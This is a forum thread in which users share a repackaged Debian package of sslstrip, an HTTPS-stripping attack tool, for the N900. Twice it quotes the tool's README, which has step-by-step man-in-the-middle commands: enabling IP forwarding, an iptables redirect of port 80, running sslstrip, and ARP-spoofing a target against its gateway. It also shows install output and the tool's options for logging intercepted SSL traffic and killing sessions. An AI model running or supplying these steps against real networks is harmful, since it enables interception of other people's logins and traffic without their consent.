Active Topics
-
Porting apps to Leste (32)
to Maemo 7 / Leste by Arno_11 - 18 hrs, 10 mins ago -
[ANNOUNCE] CSSU-thumb thread - stable Thumb2 on N900 (2,264)
to Maemo 5 / Fremantle by panjgoori - 2 days, 12 hrs ago -
Full linux distros on Sailfish OS (254)
to SailfishOS by qoh - 3 days, 10 hrs ago - more...
|
2011-07-19
, 17:47
|
|
Posts: 458 |
Thanked: 783 times |
Joined on Jan 2010
@ France
|
#2
|
Originally Posted by thopiekar
Well,
As someone on IRC asked for sslstrip I now took some time and repackaged the package from blackbox PPA to make it work with debhelper5.
#################
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Requirements
Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)
Setup
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip
Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.
How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.
[ http://www.thoughtcrime.org/software/sslstrip/ ]
Here is the answer of the 'someone' guy
All goes well, except the link to the binary doesn't work & removing the package leave directory of installation ...
Googling a little teach me how to made a 'postinst' & 'prerm'scripts fixing the problem ...
Look in attachment for fixed package with source ...
So to be clear, right now :
Code:
-bash-2.05b# dpkg -i sslstrip_0.9-1_all.deb && sslstrip --help Selecting previously deselected package sslstrip. (Reading database ... 38833 files and directories currently installed.) Unpacking sslstrip (from sslstrip_0.9-1_all.deb) ... Setting up sslstrip (0.9-1) ... sslstrip 0.9 by Moxie Marlinspike Usage: sslstrip <options> Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message. -bash-2.05b#
A++
Last edited by colin.stephane; 2011-07-19 at 18:48. Reason: Fixing also the deletion of package directory when purging ...
#################
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
Requirements
Python >= 2.5 (apt-get install python)
The python "twisted-web" module (apt-get install python-twisted-web)
Setup
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
(optional) sudo python ./setup.py install
Running sslstrip
Flip your machine into forwarding mode. (echo "1" > /proc/sys/net/ipv4/ip_forward)
Setup iptables to redirect HTTP traffic to sslstrip. (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>)
Run sslstrip. (sslstrip.py -l <listenPort>)
Run arpspoof to convince a network they should send their traffic to you. (arpspoof -i <interface> -t <targetIP> <gatewayIP>)
That should do it.
How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).
At this point, sslstrip receives the traffic and does its magic.
[ http://www.thoughtcrime.org/software/sslstrip/ ]